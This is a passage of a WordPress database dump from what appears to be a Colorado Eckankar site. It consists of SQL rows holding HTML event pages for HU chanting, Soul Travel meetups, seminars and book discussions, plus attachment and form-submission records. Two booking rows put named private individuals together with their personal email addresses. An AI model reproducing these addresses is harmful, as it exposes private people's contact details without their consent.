14pt;\">Do you have challenges you don’t understand?</span></strong></li>\r\n</ul>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">Come share your insights and explore how gaining an understanding of Karma and Reincarnation can help you handle challenges in a better way, develop the quality of divine love, and become more godlike.</span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">This event is sponsored by Eckankar and is free of charge. Find out more about HU at <a href=\"https://www.eckankar.org/experience/hu-the-sound-of-soul/\" target=\"_blank\" rel=\"noopener\">What is HU? | HU is the Sound of Soul | ECKANKAR.</a></span></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>','Karma and Reincarnation','','publish','closed','closed','','karma-and-reincarnation-4','','','2023-08-30 10:16:28','2023-08-30 16:16:28','',0,'https://eckankar-colorado.org/?post_type=mec-events&#038;p=268953',0,'mec-events','',0),(268954,2,'2023-08-30 09:49:58','2023-08-30 15:49:58','','archway-garden-2','','inherit','closed','closed','','archway-garden-2','','','2023-08-30 09:49:58','2023-08-30 15:49:58','',268953,'https://eckankar-colorado.org/wp-content/uploads/2023/08/archway-garden-2.jpg',0,'attachment','image/jpeg',0),(269055,0,'2023-09-13 19:08:48','2023-09-14 01:08:48','','','','publish','closed','closed','','269055','','','2023-09-13 19:08:48','2023-09-14 01:08:48','',0,'https://eckankar-colorado.org/nf_sub/269055/',0,'nf_sub','',0),(269115,0,'2023-09-23 03:54:57','2023-09-23 09:54:57','','','','publish','closed','closed','','269115','','','2023-09-23 03:54:57','2023-09-23 09:54:57','',0,'https://eckankar-colorado.org/nf_sub/269115/',0,'nf_sub','',0),(268958,2,'2023-08-31 09:42:21','2023-08-31 15:42:21','<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-lg-12 col-md-12 col-xs-12 col-sm-12\">\r\n<p class=\"\"><strong><span style=\"font-size: 16pt; color: #ad7f14;\"><span style=\"font-size: 20pt;\">A Secret to Spiritual Living.</span><br>\r\n</span></strong></p>\r\n<p class=\"\" style=\"box-shadow: #cecece 0px 0px 0px 0px inset; padding-top: 0em; margin-top: -10px;\"><strong><span style=\"font-size: 18pt;\">October 20–22, 2023<br>\r\n</span></strong><strong><span style=\"font-size: 18pt;\">Minneapolis, Minnesota</span></strong></p>\r\n<blockquote class=\"bg-blockquote border\" style=\"border-color: #ad7f14; margin-top: -15px; margin-left: 20px;\">\r\n<p class=\"\"><span style=\"color: #666666; font-size: 14pt;\">“The daily struggles that life presents are opportunities to cultivate spiritual grace.<br>\r\nGraceful living is to realize everything that comes into your life is for the good.<br>\r\nIt is having the grace to accept God’s will as it appears.”</span><br>\r\n<span style=\"font-size: 12pt; color: #666666;\">— Harold Klemp, the<span style=\"font-variant: small-caps;\"> Mahanta</span>, the Living ECK Master</span></p>\r\n</blockquote>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-lg-12 col-md-12 col-xs-12 col-sm-12\">\r\n<p class=\"\"><span style=\"font-size: 14pt;\">This seminar can help you move forward spiritually as a divine light of God that shines with the certainty of life!</span></p>\r\n<p class=\"\"><strong><span style=\"font-size: 16pt;\">Weekend events include:</span></strong></p>\r\n<ul class=\"\" style=\"box-shadow: #cecece 0px 0px 0px 0px inset; margin-top: -10px;\">\r\n	<li><span style=\"font-size: 14pt;\">Inspiring talks</span></li>\r\n	<li><span style=\"font-size: 14pt;\">Heart-opening creative arts</span></li>\r\n	<li><span style=\"font-size: 14pt;\">Roundtable discussions</span></li>\r\n	<li><span style=\"font-size: 14pt;\">Sri Harold Klemp’s featured Saturday-evening talk</span></li>\r\n</ul>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">The highlight of the seminar is the opportunity to hear Sri Harold, the <span style=\"font-variant: small-caps;\"> Mahanta</span>, the Living ECK Master, speak to the world. His stories and wisdom open the heart to a higher love and show you practical ways to live the spiritual life to its fullest potential.</span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">Whatever your faith or background, come and discover more about your divine nature as Soul!</span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\"><strong><em>Registration Complimentary for Guests</em></strong></span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\"><a class=\"meetupreg\" href=\"https://www.eckankar.org/eny23-prereg-landing-page/\" target=\"_blank\" rel=\"noopener noreferrer\">Get More Information and Register Now!</a></span></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>','The Power of Grace','','publish','closed','closed','','the-power-of-grace','','','2023-10-20 21:03:20','2023-10-21 03:03:20','',0,'https://eckankar-colorado.org/?post_type=mec-events&#038;p=268958',0,'mec-events','',0),(268961,2,'2023-08-31 10:31:54','2023-08-31 16:31:54','','2023-ESC-Oct-Seminar-web2','','inherit','closed','closed','','2023-esc-oct-seminar-web2','','','2023-08-31 10:31:54','2023-08-31 16:31:54','',268958,'https://eckankar-colorado.org/wp-content/uploads/2023/08/2023-ESC-Oct-Seminar-web2.jpg',0,'attachment','image/jpeg',0),(268962,2,'2023-08-31 12:46:37','0000-00-00 00:00:00','<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<p class=\"\"><strong><span style=\"font-size: 14pt;\"><span style=\"font-size: 18pt; color: #eb9809;\">Video and Spiritual Discussion.</span> <br>\r\n</span></strong></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">You are warmly invited to watch a 30 minute video presentation of a talk by Sri Harold Klemp, Spiritual Leader of Eckankar. It will be followed by a discussion on the spiritual topics mentioned in the talk. Come and share your thoughts and insights with other like-minded individuals.</span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">Video presentations of Sri Harold Klemp offer a unique opportunity to hear stories and spiritual insights that bring meaning, connection, and humor to the workings of Spirit in our everyday lives.</span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">All are warmly welcome.</span></p>\r\n<p class=\"\"><span style=\"font-size: 12pt;\"><strong>COVID-19 Safety Measures<br>\r\n**</strong> <em>Since contracting COVID-19 may still be possible, please take the health steps you consider best. It is appreciated that by attending you are taking responsibility for your own health.</em></span></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>','Video and Spiritual Discussion - COLORADO SPRINGS TEMPLATE | Title Goes Here','','draft','open','closed','','','','','2023-08-31 12:46:37','2023-08-31 18:46:37','',0,'https://eckankar-colorado.org/?post_type=mec-events&#038;p=268962',0,'mec-events','',0),(268963,2,'2023-08-31 11:05:27','2023-08-31 17:05:27','<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<p class=\"\"><strong><span style=\"font-size: 14pt;\"><span style=\"font-size: 18pt; color: #eb9809;\">Video and Spiritual Discussion.</span> <br>\r\n</span></strong></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">You are warmly invited to watch a 30 minute video presentation of a talk by Sri Harold Klemp, Spiritual Leader of Eckankar. It will be followed by a discussion on the spiritual topics mentioned in the talk. Come and share your thoughts and insights with other like-minded individuals.</span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">Video presentations of Sri Harold Klemp offer a unique opportunity to hear stories and spiritual insights that bring meaning, connection, and humor to the workings of Spirit in our everyday lives.</span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">All are welcome.</span></p>\r\n<p class=\"\"><strong>COVID-19 Safety Measures<br>\r\n**</strong> <em>Since contracting COVID-19 may still be possible, please take the health steps you consider best. It is appreciated that by attending you are taking responsibility for your own health.</em></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>','The Road to Spiritual Freedom: A History','','publish','open','closed','','the-road-to-spiritual-freedom-a-history','','','2023-08-31 11:07:11','2023-08-31 17:07:11','',0,'https://eckankar-colorado.org/?post_type=mec-events&#038;p=268963',0,'mec-events','',0),(268964,2,'2023-08-31 11:05:10','2023-08-31 17:05:10','','fall-path-1','','inherit','closed','closed','','fall-path-1','','','2023-08-31 11:05:10','2023-08-31 17:05:10','',268963,'https://eckankar-colorado.org/wp-content/uploads/2023/08/fall-path-1.jpg',0,'attachment','image/jpeg',0),(268965,2,'2023-08-31 11:39:06','2023-08-31 17:39:06','<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<p class=\"\"><strong><span style=\"font-size: 16pt;\">Join us for this Spiritual Discussion based on the book - </span><span style=\"font-size: 16pt;\"><em>The Art of Spiritual Dreaming&nbsp;</em></span></strong><span style=\"font-size: 16pt;\"> —by Harold Klemp<br>\r\n</span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">Dreams touch every level of our life. They may let us glimpse the future, or give suggestions for healing, or share insights into our relationships. Above all, they can and will steer us more directly toward God.</span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">Join us for this book discussion and learn how dreams can help you gain insights from the past and future, grow in confidence, heal yourself spiritually, make decisions about your career and finances. Do this from a unique point of view: recognize the spiritual nature of your dreams.</span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">Your life is the canvas. You are the artist. Paint a more fulfilling life for yourself using Harold Klemp\'s proven techniques in <em>The Art of Spiritual Dreaming</em>.</span></p>\r\n<p class=\"\"><span class=\"\" style=\"font-size: 14pt;\">This book discussion class will be held every first Sunday at 10:30pm. </span></p>\r\n</div>\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<p class=\"\"><span class=\"\" style=\"font-size: 14pt;\">&nbsp;</span><span style=\"font-size: 14pt;\">You can purchase this book at your local ECK Center, through many online bookstores like Amazon, or order from the <a href=\"https://www.eckbooks.org/items/-81-0.html\" target=\"_blank\" rel=\"noopener\">ECK Bookstore</a>.</span></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>','The Art of Spiritual Dreaming','','publish','closed','closed','','the-art-of-spiritual-dreaming','','','2023-10-02 12:52:26','2023-10-02 18:52:26','',0,'https://eckankar-colorado.org/?post_type=mec-events&#038;p=268965',0,'mec-events','',0),(268966,2,'2023-08-31 11:20:18','2023-08-31 17:20:18','','spiritual-dreaming-book-1','','inherit','closed','closed','','spiritual-dreaming-book-1','','','2023-08-31 11:20:18','2023-08-31 17:20:18','',268965,'https://eckankar-colorado.org/wp-content/uploads/2023/08/spiritual-dreaming-book-1.jpg',0,'attachment','image/jpeg',0),(268969,1000092,'2023-09-03 10:30:00','2023-09-03 16:30:00','','Kathy Young - katyahuu@gmail.com','','publish','closed','closed','','kathy-young-katyahuugmail-com','','','2023-09-03 10:30:00','2023-09-03 16:30:00','',0,'https://eckankar-colorado.org/?post_type=mec-books&p=268969',0,'mec-books','',0),(268970,0,'2023-09-03 11:25:08','2023-09-03 17:25:08','','','','publish','closed','closed','','268970','','','2023-09-03 11:25:08','2023-09-03 17:25:08','',0,'https://eckankar-colorado.org/nf_sub/268970/',0,'nf_sub','',0),(269030,0,'2023-09-10 18:55:05','2023-09-11 00:55:05','','','','publish','closed','closed','','269030','','','2023-09-10 18:55:05','2023-09-11 00:55:05','',0,'https://eckankar-colorado.org/nf_sub/269030/',0,'nf_sub','',0),(268972,2,'2023-09-03 13:00:21','2023-09-03 19:00:21','<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-lg-12 col-md-12 col-xs-12 col-sm-12\">\r\n<p class=\"\"><span style=\"font-size: 14pt;\"><strong><span style=\"color: #ad7f14;\"><span style=\"font-size: 16pt;\">Join us for an expansive in-person experience, where you\'ll learn ways to shift your consciousness (Soul Travel) to create a better life.</span><br>\r\n</span></strong></span></p>\r\n<ul class=\"\">\r\n	<li><strong><span style=\"font-size: 14pt;\">Do you want to learn how to leave the physical body and safely explore the spiritual worlds?</span></strong></li>\r\n	<li><strong><span style=\"font-size: 14pt;\">Would you like to enjoy a heightened state of awareness 24 hours a day?</span></strong></li>\r\n	<li><strong><span style=\"font-size: 14pt;\">Are you interested in tapping into your own inner wisdom to help you in your daily life?</span></strong></li>\r\n</ul>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">If you answered yes to any of these questions, then this Meetup is for you. We will talk about what Soul Travel is and how you do it. We will try a couple techniques to help get you started. Our goal is that each person will see the value of exploring Soul Travel to gain spiritual insights and make this life better.</span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">Harold Klemp says in his book, <a href=\"https://www.amazon.com/ECK-Wisdom-Soul-Travel-ebook/dp/B08LNSY2Y6\" target=\"_blank\" rel=\"noopener\"><em>ECK Wisdom on Soul Travel</em>,</a> p.4, “So, in the simplest terms, Soul Travel is an individual moving closer to the heart of God.” This book is also available from the <a href=\"https://www.eckbooks.org/items/-2131-7.html?\" target=\"_blank\" rel=\"noopener\">ECK Bookstore</a>.</span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">All are welcome to join us in a 6-month spiritual discussion on past lives, dreams, and soul travel. We will meet on the 2nd Wednesday of the month at 6:30pm at the Parker Public Library. Free books will be available and there is no need to have the books ahead of time. You can join one of the classes or all of them.</span></p>\r\n<p class=\"\" style=\"padding-left: 40px;\"><strong><span style=\"font-size: 14pt;\">Our remaining sessions are:</span></strong></p>\r\n<p class=\"\" style=\"padding-left: 40px;\"><span style=\"font-size: 14pt;\"><strong>September 13</strong> - Soul Travel: Learn to Shift Your Consciousness for a Better Life</span></p>\r\n<p class=\"\" style=\"padding-left: 40px;\"><span style=\"font-size: 14pt;\"><strong>October 11</strong> - Beyond Soul Travel: Being, Knowing, and Seeing</span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">This event, sponsored by Eckankar as a community service, is a spiritual resource for people of all faiths and beliefs. Eckankar is the Path of Spiritual Freedom. It is an individual, creative practice to experience and explore our own unique relationship with the Divine.</span></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-lg-12 col-md-12 col-xs-12 col-sm-12\">\r\n<p class=\"\"><a class=\"meetupreg\" href=\"https://www.meetup.com/spiritual-experiences-group-of-parker/events/295832429/\" target=\"_blank\" rel=\"noopener noreferrer\">Register Now!</a></p>\r\n<p class=\"\"><span style=\"font-size: 12pt;\"><strong>COVID-19 Safety Measures<br>\r\n**</strong> <em>Since contracting COVID-19 may still be possible, please take the health steps you consider best. It is appreciated that by attending you are taking responsibility for your own health.</em></span></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>','Soul Travel: Learn to Shift Your Consciousness for a Better Life','','publish','closed','closed','','soul-travel-learn-to-shift-your-consciousness-for-a-better-life','','','2023-09-03 13:00:21','2023-09-03 19:00:21','',0,'https://eckankar-colorado.org/?post_type=mec-events&#038;p=268972',0,'mec-events','',0),(268973,2,'2023-09-03 12:36:06','2023-09-03 18:36:06','','happy-girl-on-mountain','','inherit','closed','closed','','happy-girl-on-mountain','','','2023-09-03 12:36:06','2023-09-03 18:36:06','',268972,'https://eckankar-colorado.org/wp-content/uploads/2023/09/happy-girl-on-mountain.jpg',0,'attachment','image/jpeg',0),(268978,0,'2023-09-04 11:13:35','2023-09-04 17:13:35','','','','publish','closed','closed','','268978','','','2023-09-04 11:13:35','2023-09-04 17:13:35','',0,'https://eckankar-colorado.org/nf_sub/268978/',0,'nf_sub','',0),(268979,2,'2023-09-04 15:12:49','2023-09-04 21:12:49','','image-1','','inherit','closed','closed','','image-1','','','2023-09-04 15:12:49','2023-09-04 21:12:49','',0,'https://eckankar-colorado.org/wp-content/uploads/2023/09/image-1.webp',0,'attachment','image/webp',0),(268981,2,'2023-09-04 15:59:15','2023-09-04 21:59:15','','image-2','','inherit','closed','closed','','image-2','','','2023-09-04 15:59:15','2023-09-04 21:59:15','',0,'https://eckankar-colorado.org/wp-content/uploads/2023/09/image-2.webp',0,'attachment','image/webp',0),(269167,0,'2023-10-05 20:04:52','2023-10-06 02:04:52','','','','publish','closed','closed','','269167','','','2023-10-05 20:04:52','2023-10-06 02:04:52','',0,'https://eckankar-colorado.org/nf_sub/269167/',0,'nf_sub','',0),(269168,0,'2023-10-05 20:07:42','2023-10-06 02:07:42','','','','publish','closed','closed','','269168','','','2023-10-05 20:07:42','2023-10-06 02:07:42','',0,'https://eckankar-colorado.org/nf_sub/269168/',0,'nf_sub','',0),(269169,1000024,'2023-10-08 10:30:00','2023-10-08 16:30:00','','Roger  Morandi - rmorandi@comcast.net','','publish','closed','closed','','roger-morandi-rmorandicomcast-net-7','','','2023-10-08 10:30:00','2023-10-08 16:30:00','',0,'https://eckankar-colorado.org/?post_type=mec-books&p=269169',0,'mec-books','',0),(269170,0,'2023-10-05 21:36:37','2023-10-06 03:36:37','','','','publish','closed','closed','','269170','','','2023-10-05 21:36:37','2023-10-06 03:36:37','',0,'https://eckankar-colorado.org/nf_sub/269170/',0,'nf_sub','',0),(268983,2,'2023-09-06 10:12:13','2023-09-06 16:12:13','<div class=\"boldgrid-section\" style=\"box-shadow: #cecece 0px 0px 0px 0px inset; background-image: linear-gradient(to left, rgba(255, 255, 255, 0.9), rgba(255, 255, 255, 0.9)), url(\'https://eckankar-colorado.org/wp-content/uploads/2023/09/sky-birds-3.jpg\'); background-size: cover; background-repeat: no-repeat; background-position: 50% 50%;\" data-bg-overlaycolor-alpha=\"0.9\" data-bg-overlaycolor-class=\"1\" data-image-url=\"https://eckankar-colorado.org/wp-content/uploads/2023/09/sky-birds-3.jpg\" data-bg-overlaycolor=\"rgba(255, 255, 255,0.9)\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 80px; padding-bottom: 47px;\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\" style=\"box-shadow: rgba(0, 0, 0, 0.25) 0px 54px 55px, rgba(0, 0, 0, 0.12) 0px -12px 30px, rgba(0, 0, 0, 0.12) 0px 4px 6px, rgba(0, 0, 0, 0.17) 0px 12px 13px, rgba(0, 0, 0, 0.09) 0px -3px 5px;\">\r\n<div class=\"\">\r\n<p class=\"\" style=\"text-align: center;\">[ninja_form id=61]</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>','Satsang Class Registrations - 2023-2024','','publish','closed','closed','','satsang-class-registrations-2023-2024','','','2023-09-11 00:52:14','2023-09-11 06:52:14','',79666,'https://eckankar-colorado.org/?page_id=268983',0,'page','',0),(269002,2,'2023-09-06 10:46:37','2023-09-06 16:46:37','','sky-birds-3','','inherit','closed','closed','','sky-birds-3','','','2023-09-06 10:46:37','2023-09-06 16:46:37','',268983,'https://eckankar-colorado.org/wp-content/uploads/2023/09/sky-birds-3.jpg',0,'attachment','image/jpeg',0),(269198,0,'2023-10-11 19:39:05','2023-10-12 01:39:05','','','','publish','closed','closed','','269198','','','2023-10-11 19:39:05','2023-10-12 01:39:05','',0,'https://eckankar-colorado.org/nf_sub/269198/',0,'nf_sub','',0),(269199,0,'2023-10-11 19:39:16','2023-10-12 01:39:16','','','','publish','closed','closed','','269199','','','2023-10-11 19:39:16','2023-10-12 01:39:16','',0,'https://eckankar-colorado.org/nf_sub/269199/',0,'nf_sub','',0),(269200,0,'2023-10-11 19:44:13','2023-10-12 01:44:13','','','','publish','closed','closed','','269200','','','2023-10-11 19:44:13','2023-10-12 01:44:13','',0,'https://eckankar-colorado.org/nf_sub/269200/',0,'nf_sub','',0),(269201,0,'2023-10-12 11:11:31','2023-10-12 17:11:31','','','','publish','closed','closed','','269201','','','2023-10-12 11:11:31','2023-10-12 17:11:31','',0,'https://eckankar-colorado.org/nf_sub/269201/',0,'nf_sub','',0),(269211,0,'2023-10-16 18:29:55','2023-10-17 00:29:55','','','','publish','closed','closed','','269211','','','2023-10-16 18:29:55','2023-10-17 00:29:55','',0,'https://eckankar-colorado.org/nf_sub/269211/',0,'nf_sub','',0),(269212,0,'2023-10-16 20:35:19','2023-10-17 02:35:19','','','','publish','closed','closed','','269212','','','2023-10-16 20:35:19','2023-10-17 02:35:19','',0,'https://eckankar-colorado.org/nf_sub/269212/',0,'nf_sub','',0),(269213,0,'2023-10-16 21:49:27','2023-10-17 03:49:27','','','','publish','closed','closed','','269213','','','2023-10-16 21:49:27','2023-10-17 03:49:27','',0,'https://eckankar-colorado.org/nf_sub/269213/',0,'nf_sub','',0),(269214,0,'2023-10-17 01:13:57','2023-10-17 07:13:57','','','','publish','closed','closed','','269214','','','2023-10-17 01:13:57','2023-10-17 07:13:57','',0,'https://eckankar-colorado.org/nf_sub/269214/',0,'nf_sub','',0),(269215,0,'2023-10-17 07:56:02','2023-10-17 13:56:02','','','','publish','closed','closed','','269215','','','2023-10-17 07:56:02','2023-10-17 13:56:02','',0,'https://eckankar-colorado.org/nf_sub/269215/',0,'nf_sub','',0),(269216,0,'2023-10-17 21:54:53','2023-10-18 03:54:53','','','','publish','closed','closed','','269216','','','2023-10-17 21:54:53','2023-10-18 03:54:53','',0,'https://eckankar-colorado.org/nf_sub/269216/',0,'nf_sub','',0),(269217,0,'2023-10-17 23:19:38','2023-10-18 05:19:38','','','','publish','closed','closed','','269217','','','2023-10-17 23:19:38','2023-10-18 05:19:38','',0,'https://eckankar-colorado.org/nf_sub/269217/',0,'nf_sub','',0),(269218,0,'2023-10-17 23:22:43','2023-10-18 05:22:43','','','','publish','closed','closed','','269218','','','2023-10-17 23:22:43','2023-10-18 05:22:43','',0,'https://eckankar-colorado.org/nf_sub/269218/',0,'nf_sub','',0),(269219,0,'2023-10-18 06:38:21','2023-10-18 12:38:21','','','','publish','closed','closed','','269219','','','2023-10-18 06:38:21','2023-10-18 12:38:21','',0,'https://eckankar-colorado.org/nf_sub/269219/',0,'nf_sub','',0),(269220,0,'2023-10-18 08:53:47','2023-10-18 14:53:47','','','','publish','closed','closed','','269220','','','2023-10-18 08:53:47','2023-10-18 14:53:47','',0,'https://eckankar-colorado.org/nf_sub/269220/',0,'nf_sub','',0),(269221,0,'2023-10-18 08:54:53','2023-10-18 14:54:53','','','','publish','closed','closed','','269221','','','2023-10-18 08:54:53','2023-10-18 14:54:53','',0,'https://eckankar-colorado.org/nf_sub/269221/',0,'nf_sub','',0),(269222,0,'2023-10-18 09:49:48','2023-10-18 15:49:48','','','','publish','closed','closed','','269222','','','2023-10-18 09:49:48','2023-10-18 15:49:48','',0,'https://eckankar-colorado.org/nf_sub/269222/',0,'nf_sub','',0),(269223,0,'2023-10-18 09:55:58','2023-10-18 15:55:58','','','','publish','closed','closed','','269223','','','2023-10-18 09:55:58','2023-10-18 15:55:58','',0,'https://eckankar-colorado.org/nf_sub/269223/',0,'nf_sub','',0),(269256,0,'2023-10-25 13:23:09','2023-10-25 19:23:09','','','','publish','closed','closed','','269256','','','2023-10-25 13:23:09','2023-10-25 19:23:09','',0,'https://eckankar-colorado.org/nf_sub/269256/',0,'nf_sub','',0),(269258,0,'2023-10-25 13:43:24','2023-10-25 19:43:24','','','','publish','closed','closed','','269258','','','2023-10-25 13:43:24','2023-10-25 19:43:24','',0,'https://eckankar-colorado.org/nf_sub/269258/',0,'nf_sub','',0),(269259,2,'2023-10-25 13:48:46','2023-10-25 19:48:46','<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<p class=\"\" style=\"line-height: 32px;\"><span style=\"font-size: 20pt;\"><strong><span class=\"\" style=\"color: #ad7f14;\">Discover HU, a natural way to connect with Spirit</span></strong></span></p>\r\n<p class=\"\" style=\"line-height: 32px;\"><span style=\"font-size: 14pt;\">You are warmly invited to experience HU, a divine sound that courses through all of life and through every atom of your body. HU is an ancient name for God, a sacred sound and a carrier of love between Soul and God. It has been sung for thousands of years, and in many places, for spiritual unfoldment. It can uplift people of any religion, culture, or walk of life.</span><br>\r\n<br>\r\n<span style=\"font-size: 14pt;\">Singing HU acts as a tuning fork, aligning Soul to higher states of love, creativity, healing, and awareness. When sung or chanted with an open heart, it opens the lines of communication to the most sacred part of yourself.</span><br>\r\n<br>\r\n<span style=\"font-size: 14pt;\">In this ONLINE event, you will have the opportunity to experience some of the many benefits of singing HU:</span></p>\r\n<ul class=\"\">\r\n	<li><span style=\"font-size: 14pt;\">Inner peace and calm</span></li>\r\n	<li><span style=\"font-size: 14pt;\">Divine love</span></li>\r\n	<li><span style=\"font-size: 14pt;\">Expanded awareness</span></li>\r\n	<li><span style=\"font-size: 14pt;\">Spiritual self-discovery and growth</span></li>\r\n	<li><span style=\"font-size: 14pt;\">Healing of the heart</span></li>\r\n</ul>\r\n<p class=\"\"><br>\r\n<span style=\"font-size: 14pt;\">The event will include singing HU for 15 to 20 minutes, a few minutes of quiet contemplation, and discussion groups in Zoom breakout rooms, where you can participate in spiritual conversation with others of like heart.</span><br>\r\n<br>\r\n<span style=\"font-size: 14pt;\">This event is sponsored by Eckankar and is free of charge. Find out more about HU at <a class=\"link\" title=\"www.TheSoundofSoul.org\" href=\"http://www.TheSoundofSoul.org\" target=\"_blank\" rel=\"noopener\">www.TheSoundofSoul.org</a>.</span></p>\r\n<p class=\"\"><span style=\"color: #333333;\"><span style=\"font-size: 14pt;\"><strong><span style=\"color: #1d5791;\">For online login information, just fill out the form below. Hope to see you there!<br>\r\n</span></strong></span></span></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>','Tune In to the God Force','','publish','closed','closed','','tune-in-to-the-god-force','','','2023-10-25 13:48:46','2023-10-25 19:48:46','',0,'https://eckankar-colorado.org/?post_type=mec-events&#038;p=269259',0,'mec-events','',0),(269260,2,'2023-10-25 13:55:39','2023-10-25 19:55:39','<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<p class=\"\"><strong><span style=\"font-size: 18pt; color: #cf7119;\">Wake Up And Step Into A Greater Room.</span></strong></p>\r\n<p class=\"\"><span style=\"font-size: 16pt;\"><strong>People of all faiths are warmly invited to the ECK Light and Sound Service.<br>\r\nEach service focuses on spiritual principles at work in our lives.</strong></span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">You will hear inspiring spiritual stories, experience the HU Chant, and be able to speak with other like-hearted spiritual seekers. It is an uplifting event where you can reflect on and connect with the Light and Sound, the divine aspect within yourself.</span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">The ECK Light and Sound Service is followed by light refreshments and the opportunity to share informally.</span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">Join others seeking to bring more insight and divine love into their lives at this special celebration of the Light and Sound of God.</span></p>\r\n<ul class=\"\">\r\n	<li><span style=\"color: #666666; font-size: 14pt;\">Discover spiritual tools to meet life’s challenges</span></li>\r\n	<li><span style=\"color: #666666; font-size: 14pt;\">Awaken to the divine guidance always within you</span></li>\r\n	<li><span style=\"color: #666666; font-size: 14pt;\">Open your heart to give and receive more divine love</span></li>\r\n	<li><span style=\"color: #666666; font-size: 14pt;\">Experience how the Light and Sound of God can help you lead a happier life</span></li>\r\n</ul>\r\n<p class=\"\"><span style=\"color: #666666;\"><span style=\"font-size: 14pt;\">You are invited to come and experience spiritual growth and fellowship as you explore what could be your next spiritual step.<br>\r\n</span></span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt; color: #1d5791;\"><strong>For those who cannot attend in person, you are welcome to attend online.<br>\r\nPlease register to get the Zoom login information. Hope to see you there!</strong></span></p>\r\n<p class=\"\"><span style=\"font-size: 12pt;\"><strong>COVID-19 Safety Measures<br>\r\n**</strong> <em>Since contracting COVID-19 may still be possible, please take the health steps you consider best. It is appreciated that by attending you are taking responsibility for your own health.</em></span></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>','Our Spiritual Wake-up Calls','','publish','closed','closed','','our-spiritual-wake-up-calls','','','2023-11-12 15:04:52','2023-11-12 22:04:52','',0,'https://eckankar-colorado.org/?post_type=mec-events&#038;p=269260',0,'mec-events','',0),(269262,2,'2023-10-25 14:24:30','2023-10-25 20:24:30','<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-lg-12 col-md-12 col-xs-12 col-sm-12\">\r\n<p class=\"\"><strong><span style=\"font-size: 18pt; color: #ad7f14;\">A Secret to Spiritual Living<br>\r\n</span></strong></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">Step confidently into a larger room, a higher consciousness, where the grace of acceptance, understanding, healing, and happiness can be found. Discover spiritual secrets to help you realize the profound reality of God’s love in your life.</span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">*When was the last time you recognized even a small miracle in your life?</span><br>\r\n<span style=\"font-size: 14pt;\">*Discover spiritual secrets to help you realize the profound reality of God’s love in your everyday life.</span><br>\r\n<span style=\"font-size: 14pt;\">*Explore how everything that happens to you is truly is for your highest spiritual benefit.</span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">Come share your insights and explore how gaining an understanding of The Power of God’s Grace can help you handle challenges in a better way, develop the quality of divine love, and become more godlike.</span></p>\r\n<p>&nbsp;</p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">This event is sponsored by Eckankar and is free of charge. Find out more about HU at <a href=\"https://www.eckankar.org/experience/hu-the-sound-of-soul/\" target=\"_blank\" rel=\"noopener\">What is HU? | HU is the Sound of Soul | ECKANKAR.</a></span></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-lg-12 col-md-12 col-xs-12 col-sm-12\">\r\n<p class=\"\"><a class=\"meetupreg\" href=\"https://www.meetup.com/segofbv/events/296647792/\" 